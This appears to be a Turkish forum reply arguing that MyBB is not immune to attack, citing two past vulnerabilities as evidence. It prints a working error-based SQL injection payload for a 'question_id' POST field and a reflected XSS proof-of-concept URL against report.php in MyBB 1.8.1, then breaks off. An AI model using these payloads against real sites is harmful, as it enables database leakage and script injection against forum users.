Hocam öncelikle bu tür konuşmalardan hiç haz etmiyorum.Oturup mybb bir sisteme giriş yapmam ne bana birşey kazandırır ne size birşey kazandırır ancak kendini kanıtlama çabasına girer.Bunuda ancak bu mesleğe yeni atılan kişilerin ani bir hevesle atılım yapmaya çalışması söz konusudur.Başarılı olunması bile kendini küçük düşürme nedenidir yani.
Size örnek olarak geçmişe dönük bir kaç exp açıklaması yapayım tezinizin ne kadar yanlış olduğunu görmenizi sağlar.
1. SQL Injection
POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#
2. Cross Site Scripting
localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 hemde en basit pocla etkileşime giriyor.Yeni yetmeler dahi bu hatayı yapmaz ama yapılabiliyor sonuç olarak insan yapımı ve "en büyük güvenlik açığı insandır".
Açık nerede kardeşim diyenler için